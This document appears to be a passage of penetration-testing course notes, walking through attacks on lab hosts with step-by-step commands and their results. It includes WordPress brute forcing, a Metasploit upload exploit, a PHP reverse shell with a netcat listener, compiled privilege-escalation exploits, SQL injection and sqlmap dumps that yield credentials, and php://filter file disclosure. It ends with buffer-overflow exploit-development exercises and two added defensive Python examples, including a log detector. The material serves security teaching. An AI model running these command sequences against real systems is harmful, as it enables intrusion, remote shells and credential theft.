928wpscan --url 172.31.2.117/bull/ -r --enumerate u --enumerate p --enumerate t --enumerate tt
929
930
931cewl -w words.txt http://172.31.2.117/bull/
932
933
934cewl http://172.31.2.117/bull/ -d 1 -m 6 -w whateverbro.txt
935
936wc -l whateverbro.txt
937
938john --wordlist=whateverbro.txt --rules --stdout > words-john.txt
939
940wc -l words-john.txt
941
942wpscan --username bully --url http://172.31.2.117/bull/ --wordlist words-john.txt --threads 10
943-----------------------------------------------------------------------
944
945
946
947
948
949Step 5: Attack vulnerable Wordpress plugin with Metasploit (just doing the exact same attack with MSF)
950---------------------------Type This-----------------------------------
951msfconsole
952
953use exploit/unix/webapp/wp_slideshowgallery_upload
954
955set RHOST 172.31.2.117
956
957set RPORT 80
958
959set TARGETURI /bull
960
961set WP_USER bully
962
963set WP_PASSWORD Bighornedbulls
964
965exploit
966-----------------------------------------------------------------------
967
Damn...that didn't work. You can't get a reverse shell from inside the lab network back to a host in the VPN network range.
This is a lab limitation that I implemented to stop students from compromising hosts in the lab network
and then attacking other students from the lab network.


---------------------------Type This-----------------------------------
wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz

tar -zxvf php-reverse-shell-1.0.tar.gz

cd ~/toolz/php-reverse-shell-1.0/

nano php-reverse-shell.php
-----------------------------------------------------------------------
 ***** change the $ip and $port variables to a host that you have already compromised in the network
 ***** for this example I chose 172.31.2.64 and kept port 1234


---------------------------Type This-----------------------------------
chmod 777 php-reverse-shell.php
cp php-reverse-shell.php ..
-----------------------------------------------------------------------


Browse to this link https://www.exploit-db.com/raw/34681/ and copy all of the text from it.
Paste the contents of this link into a file called wp_gallery_slideshow_146_suv.py
---------------------------Type This-----------------------------------
python wp_gallery_slideshow_146_suv.py -t http://172.31.2.117/bull/ -u bully -p Bighornedbulls -f php-reverse-shell.php
-----------------------------------------------------------------------


Set up netcat listener on previously compromised host
---------------------------Type This-----------------------------------
ssh -l webmin 172.31.2.64
 webmin1980


nc -lvp 1234
-----------------------------------------------------------------------


---------------------Type This in your browser ------------------------
http://172.31.2.117/bull//wp-content/uploads/slideshow-gallery/php-reverse-shell.php
-----------------------------------------------------------------------


Now check your listener to see if you got the connection
---------------------------Type This-----------------------------------
id

/sbin/ifconfig

python -c 'import pty;pty.spawn("/bin/bash")'
-----------------------------------------------------------------------

---------------------------Type This-----------------------------------
cd /tmp
cat >> exploit2.c << out
-----------------------------------------------------------------------
**************paste in the content from here *****************
https://www.exploit-db.com/raw/37292/

**************hit enter a few times *****************

---------------------------Type This-----------------------------------
out


gcc -o boom2 exploit2.c

./boom2

id
-----------------------------------------------------------------------



---------------------------Type This-----------------------------------
sudo nmap -sV 172.31.2.181
-----------------------------------------------------------------------
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)


---------------------------Type This-----------------------------------
sudo nmap -sU -p69,161 172.31.2.181
-----------------------------------------------------------------------
PORT    STATE  SERVICE
69/udp  closed tftp
161/udp open   snmp


---------------------------Type This-----------------------------------
sudo apt-get -y install onesixtyone snmp

wget https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/wordlists-misc/wordlist-common-snmp-community-strings.txt

onesixtyone -c wordlist-common-snmp-community-strings.txt 172.31.2.181
-----------------------------------------------------------------------
Gives the error "Community string too long". A little bit of Googling turned up this reference: https://github.com/trailofbits/onesixtyone/issues/1

---------------------------Type This-----------------------------------
cat wordlist-common-snmp-community-strings.txt | grep -v TENmanUFactOryPOWER > snmp-community-strings.txt

onesixtyone -c snmp-community-strings.txt 172.31.2.181

snmpwalk -Os -c public -v 1 172.31.2.181
-----------------------------------------------------------------------

Username "eric" found in the snmpwalk output, along with the string "There is a house in New Orleans they call it..."

Googling the sentence shows that the whole line is "There is a house in New Orleans they call it the rising sun".

Try to SSH to the box using the credentials eric:therisingsun


---------------------------Type This-----------------------------------
ssh -l eric 172.31.2.181
 therisingsun

id
cat /etc/issue
uname -a
cat /etc/*release

---------------------------Type This-----------------------------------
cat >> exploit.c << out

**************paste in the content from here *****************
https://www.exploit-db.com/raw/39166/


------ hit enter a few times ------

------ then type 'out' ----- this closes the file handle...


---------------------------Type This-----------------------------------
gcc -o boom exploit.c

./boom

id


......YEAH - do the happy dance!!!!



How to go after 172.31.2.238
Reference: https://t0w3ntum.com/2017/01/07/baffle/


---------------------------------------------------------------
sudo nmap -sV -p 3260 172.31.2.217


sudo apt install open-iscsi

sudo iscsiadm -m discovery -t st -p 172.31.2.217

sudo iscsiadm -m discovery -t st -p 172.31.2.217:3260

sudo iscsiadm -m node -p 172.31.2.217 --login

sudo /bin/bash

fdisk -l
 ***** look for /dev/sda5 - Linux swap / Solaris *******

mkdir /mnt/217vm

mount /dev/sdb /mnt/217vm

cd /mnt/217vm

ls

cat flag1.txt

file bobsdisk.dsk

mkdir /media/bobsdisk

mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk

cd /media/bobsdisk/

ls

cat ToAlice.eml

cat ToAlice.eml | grep flag

file ToAlice.csv.enc

cat ToAlice.eml
 ***** look for supercalifragilisticoespialidoso ******

openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
 supercalifragilisticoespialidoso

ls

cat ToAlice.csv

1220
-----------------------------------------------------
Web Path,Reason
5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site!
c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?

-----------------------------------------------------

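The openssl enc -aes-256-cbc -d -md sha256 decrypt above worked with one hint-guessable passphrase, and that is the cryptographic weak spot of this file format: without -pbkdf2, openssl enc turns the passphrase into key and IV with the legacy EVP_BytesToKey routine, a single digest pass per candidate, so the passphrase is all the protection the container has. Added example, not part of the lab notes, standard library only: parse the Salted__ header openssl enc writes and implement that KDF beside the PBKDF2 form that -pbkdf2 -iter N uses; the passphrase and container bytes are constructed.

```python
import hashlib
import os

OPENSSL_MAGIC = b"Salted__"  # 8-byte marker 'openssl enc' writes ahead of the 8-byte salt


def parse_openssl_salted(blob):
    """Split 'openssl enc' output into (salt, ciphertext); reject anything else."""
    if len(blob) < 16 or blob[:8] != OPENSSL_MAGIC:
        raise ValueError("not an OpenSSL 'Salted__' container")
    return blob[8:16], blob[16:]


def evp_bytes_to_key(password, salt, digest="sha256", key_len=32, iv_len=16, count=1):
    """OpenSSL's legacy EVP_BytesToKey, what 'openssl enc' uses without -pbkdf2.

    D_1 = H^count(password || salt), D_i = H^count(D_(i-1) || password || salt);
    key || iv is the first key_len + iv_len bytes of D_1 || D_2 || ...
    'openssl enc' always uses count=1, so each passphrase guess costs two sha256 calls
    (or three md5 calls for the pre-1.1.0 default digest).
    """
    h = lambda data: hashlib.new(digest, data).digest()
    material, prev = b"", b""
    while len(material) < key_len + iv_len:
        d = h(prev + password + salt)
        for _ in range(count - 1):
            d = h(d)
        material += d
        prev = d
    return material[:key_len], material[key_len:key_len + iv_len]


def pbkdf2_key_iv(password, salt, iterations, digest="sha256", key_len=32, iv_len=16):
    """What 'openssl enc -pbkdf2 -iter N' derives instead: key || iv from one PBKDF2 run."""
    material = hashlib.pbkdf2_hmac(digest, password, salt, iterations, key_len + iv_len)
    return material[:key_len], material[key_len:key_len + iv_len]


def derive_for_container(blob, password, pbkdf2_iterations=None):
    """(key, iv) for a Salted__ container with the lab's -md sha256 / -aes-256-cbc sizes."""
    salt, _ciphertext = parse_openssl_salted(blob)
    if pbkdf2_iterations is None:
        return evp_bytes_to_key(password, salt)
    return pbkdf2_key_iv(password, salt, pbkdf2_iterations)


if __name__ == "__main__":
    # Constructed container: real header layout, random salt, dummy ciphertext body.
    demo = OPENSSL_MAGIC + os.urandom(8) + b"\x00" * 32
    key, iv = derive_for_container(demo, b"example-passphrase")
    print("EVP_BytesToKey key:", key.hex(), "iv:", iv.hex())
    key, iv = derive_for_container(demo, b"example-passphrase", pbkdf2_iterations=100_000)
    print("PBKDF2 key:        ", key.hex(), "iv:", iv.hex())
```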
The hints are "Web Path" and "strangest URL" so let's try the long strings in the URL:
http://172.31.2.217/5560a1468022758dba5e92ac8f2353c0/
 -- view source

Found this long base64 string in the source (it decodes to a Seinfeld Soup Nazi quote, not a flag):

------ https://www.base64decode.org/ -------
------ Decoded, but didn't find a flag -----


http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/
 -- view source --
 -- Nothing in source --

Browsed to the flag link:
view-source:http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=flag
 -- view source --
 -- Nothing in source --


Tried reading the page source through the php://filter base64 wrapper in the ?p= parameter:
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=welcome.php
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=party.php

------ https://www.base64decode.org/ -------
Use the string found here:
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php

-------------------------------------------------------------------
<?php
defined ('VIAINDEX') or die('Ooooh! So close..');
?>
<h1>Flag</h1>
<p>Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?</p>
<img src="trollface.png" />
<?php
// Ok, ok. Here's your flag!
//
// flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
//
// Well done, you're doing great so far!
// Next step. SHELL!
//
//
// Oh. That flag above? You're gonna need it...
?>



============================================ Attacking another server because I need a reverse shell =========================================
---------------------------------------------------------------------------------------------------------------------------------------------------------

Attack steps:
-------------


Step 1: Ping sweep the target network
-------------------------------------


---------------------------Type This-----------------------------------
nmap -sP 172.31.2.0/24
-----------------------------------------------------------------------


- Found 3 hosts
172.31.2.64
172.31.2.217
172.31.2.238


Step 2: Port scan target system
-------------------------------


---------------------------Type This-----------------------------------
nmap -sV 172.31.2.64
-----------------------------------------------------------------------


-------------Scan Results--------------------------------------------
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp   open     http    Apache httpd 2.4.7 ((Ubuntu))
514/tcp  filtered shell
1037/tcp filtered ams
6667/tcp open     irc     ngircd
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
--------------------------------------------------------------------


Step 3: Vulnerability Scan the webserver
----------------------------------------


---------------------------Type This-----------------------------------
cd ~/toolz/

rm -rf nikto*

git clone https://github.com/sullo/nikto.git Nikto2

cd Nikto2/program

perl nikto.pl -h 172.31.2.64
-----------------------------------------------------------------------


Step 4: Run dirbuster or similar directory bruteforce tool against the target
-----------------------------------------------------------------------------


---------------------------Type This-----------------------------------
wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl

perl Webr00t.pl -h 172.31.2.64 -v
-----------------------------------------------------------------------
 or with dirbuster (dirb)

---------------------------Type This-----------------------------------
git clone https://github.com/v0re/dirb.git

cd dirb/

./configure

make

dirb

./dirb http://172.31.2.64 wordlists/big.txt
-----------------------------------------------------------------------


Step 5: Browse the web site to look for clues
---------------------------------------------
Since no glaring vulnerabilities were found with the scanner, we start just looking around the website itself.


..... really didn't get much from here so we just opened the web page in a browser
http://172.31.2.64/

.....browsed to the webpage and saw that it pointed to:
http://172.31.2.64/jabc

....clicked on the documentation link and found hidden text that pointed to here:
http://172.31.2.64/jabcd0cs/

....saw that the app was OpenDocMan v1.2.7 and found it was vulnerable:
https://www.exploit-db.com/exploits/32075/

Tried the SQL injection described in exploit-db:
http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,version(),3,4,5,6,7,8,9

http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,user(),3,4,5,6,7,8,9



Tried to run sqlmap against the target


---------------------------Type This-----------------------------------
cd sqlmap-dev/
python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -b --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-user --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-db --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --users --passwords --dbms=mysql
-----------------------------------------------------------------------


FOUND: cracked password 'toor' for user 'drupal7' (sqlmap)
FOUND: 9CFBBC772F3F6C106020035386DA5BBBF1249A11 hash is 'toor' verified at crackstation.net
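Everything this walkthrough has thrown at the web servers so far leaves a distinctive trail in the Apache access log: the UNION SELECT injection against ajax_udf.php (by hand and via sqlmap), the php://filter source disclosure through ?p= on the .217 box, the uploaded php-reverse-shell.php being requested under wp-content/uploads, and the dirb directory brute force. Added example, not part of the course notes: a small Python detector that runs those four checks over constructed combined-format log lines mirroring the lab's requests; client addresses, timestamps and sizes are made up.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines modelled on the lab requests (not a real capture).
SAMPLE_LOG = """\
172.31.2.50 - - [05/Sep/2019:22:10:01 +0000] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version(),3,4,5,6,7,8,9 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
172.31.2.50 - - [05/Sep/2019:22:10:07 +0000] "GET /c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php HTTP/1.1" 200 904 "-" "Mozilla/5.0"
172.31.2.50 - - [05/Sep/2019:22:10:15 +0000] "GET /bull//wp-content/uploads/slideshow-gallery/php-reverse-shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
172.31.2.50 - - [05/Sep/2019:22:11:01 +0000] "GET /admin/ HTTP/1.1" 404 291 "-" "Mozilla/5.0"
172.31.2.50 - - [05/Sep/2019:22:11:01 +0000] "GET /backup/ HTTP/1.1" 404 291 "-" "Mozilla/5.0"
172.31.2.50 - - [05/Sep/2019:22:11:01 +0000] "GET /cgi-bin/ HTTP/1.1" 404 291 "-" "Mozilla/5.0"
172.31.2.50 - - [05/Sep/2019:22:11:02 +0000] "GET /config/ HTTP/1.1" 404 291 "-" "Mozilla/5.0"
172.31.2.50 - - [05/Sep/2019:22:11:02 +0000] "GET /test/ HTTP/1.1" 404 291 "-" "Mozilla/5.0"
172.31.2.9 - - [05/Sep/2019:22:12:30 +0000] "GET /jabc/index.php?q=node/3 HTTP/1.1" 200 4021 "-" "Mozilla/5.0"
172.31.2.9 - - [05/Sep/2019:22:12:31 +0000] "GET /jabc/sites/default/files/logo.png HTTP/1.1" 404 291 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
SQLI_RE = re.compile(r'\bunion\b.{0,40}\bselect\b', re.IGNORECASE | re.DOTALL)
UPLOAD_PHP_RE = re.compile(r'/wp-content/uploads/.*\.php\d?$', re.IGNORECASE)
BRUTE_FORCE_404_THRESHOLD = 5  # 404s from one client in the window before we call it a scan


def parse_line(line):
    """Pull client, status and the URL-decoded path/query out of one line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    return {"client": m.group("client"), "status": int(m.group("status")),
            "path": unquote_plus(path), "query": unquote_plus(query)}


def classify_request(req):
    """Per-request rules, evaluated on the decoded URL so %20 / + tricks do not hide anything."""
    hits = []
    if SQLI_RE.search(req["query"]):
        hits.append("sql-injection")
    if "php://" in (req["path"] + "?" + req["query"]).lower():
        hits.append("php-wrapper-lfi")
    if UPLOAD_PHP_RE.search(req["path"]):
        hits.append("uploaded-php-executed")
    return hits


def scan_access_log(text):
    """Per-request rules plus a per-client 404 counter for directory brute forcing."""
    findings, not_found = [], Counter()
    for line in text.splitlines():
        req = parse_line(line)
        if req is None:
            continue
        for rule in classify_request(req):
            findings.append({"client": req["client"], "rule": rule, "path": req["path"]})
        if req["status"] == 404:
            not_found[req["client"]] += 1
    for client, n in not_found.items():
        if n >= BRUTE_FORCE_404_THRESHOLD:
            findings.append({"client": client, "rule": "dir-bruteforce-404s", "path": f"{n} x 404"})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['client']:<14} {f['rule']:<24} {f['path']}")
```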


---------------------------Type This-----------------------------------
python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --tables --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dump --dbms=mysql
-----------------------------------------------------------------------

 username: webmin
 hash: b78aae356709f8c31118ea613980954b

https://hashkiller.co.uk/md5-decrypter.aspx

 hash: b78aae356709f8c31118ea613980954b
 pass: webmin1980


OK - /phpmyadmin and /webmin both did not work in the browser, but these credentials worked for SSH.


---------------------------Type This-----------------------------------
ssh -l webmin 172.31.2.64
 webmin1980

id

cat /etc/*release
-----------------------------------------------------------------------


....tired of not having a real command shell...


---------------------------Type This-----------------------------------
python -c 'import pty;pty.spawn("/bin/bash")'


cd /tmp

pwd


cat >> exploit.c << out

**************paste in the content from here *****************
https://www.exploit-db.com/raw/39166/


------ hit enter a few times ------

------ then type 'out' ----- this closes the file handle...


---------------------------Type This-----------------------------------
gcc -o boom exploit.c

./boom
-----------------------------------------------------------------------


------------exploit failed, damn let's try another one ---------


---------------------------Type This-----------------------------------
cat >> exploit2.c << out

**************paste in the content from here *****************
https://www.exploit-db.com/raw/37292/


out


gcc -o boom2 exploit2.c

./boom2

id


......YEAH - do the happy dance!!!!
=============================================== Now back to the previous server ==============================================================



                                      #######################################
----------- ############### # Day 3: Intro to Exploit Development ################ -----------
                                      #######################################

The first exploit
https://s3.amazonaws.com/infosecaddictsfiles/SLmail5-5-Exploit.zip

SLMail Scripts Questions

SLmail1.py
How do you start SLMail?
What do you have to be careful of when attaching your debugger to the application?
How many As are you sending to the application?

SLmail2.py
What tool(s) can be used to generate a cyclic pattern?
What port are we attacking?
What verb are we attacking?

SLmail3.py
What is the value contained in EIP?
What is the portion of the cyclic pattern that we must search for?
What is the distance to EIP?

SLmail4.py
What do you overwrite EIP with in this script?
What is the length of your shellcode in this script?
What is the difference between SOCK_STREAM and SOCK_DGRAM?

SLmail5.py
What is struct.pack and why are we using it?
Where is our JMP ESP coming from?
What is the length of our shellcode in this script?

SLmail6.py
Why do you subtract the top of ESP from the bottom of ESP in this script?
What is the length of our shellcode in this script?
What is the distance to EIP in this script?


SLmail7.py
How do you test for bad characters?
What are the bad characters in this script?
What is the address of the JMP ESP in this script and what DLL does it come from?


SLmail8.py
What is DEP and how do you disable it?
What is the purpose of the stack adjustment?
What is the purpose of the NOP sled?


If you got through SLMail comfortably, then try the script below.
https://s3.amazonaws.com/infosecaddictsfiles/ff.zip


Analysis of the exploit code:
https://www.exploit-db.com/exploits/15689/
What is the target platform that this exploit works against?
What is the variable name for the distance to EIP?
What is the actual distance to EIP in bytes?
Describe what is happening in the variable 'junk2'.

Analysis of the training walk-through based on EID: 15689:
https://s3.amazonaws.com/infosecaddictsfiles/ff.zip

ff1.py
What does the sys module do?
What is sys.argv[1] and sys.argv[2]?
What application entry point is being attacked in this script?

ff2.py
Explain what is happening in lines 18 - 20.
What is pattern_create.rb doing and where can I find it?
Why can't I just double click the file to run this script?

ff3.py
Explain what is happening in lines 17 to 25.
Explain what is happening in lines 30 to 32.
Why is everything below line 35 commented out?

ff4.py
Explain what is happening in lines 13 to 15.
Explain what is happening in line 19.
Why is everything below line 35 commented out?

ff5.py
Explain what is happening in line 15.
What is struct.pack?
How big is the shellcode in this script?

ff6.py
What is the distance to EIP?
How big is the shellcode in this script?
What is the total byte length of the data being sent to this app?

ff7.py
What is a tuple in python? Unchangeable list
How big is the shellcode in this script? 1000 Bytes
Did your app crash from this script? No

ff8.py
How big is the shellcode in this script?
What is try/except in python?
What is socket.SOCK_STREAM in Python?

ff9.py
What is going on in lines 19 and 20?
What is the length of the NOPs?
What is socket.SOCK_STREAM in Python?

ff010.py
What is going on in lines 18 - 20?
How would a stack adjustment help this script?
1631How would a stack adjustment help this script?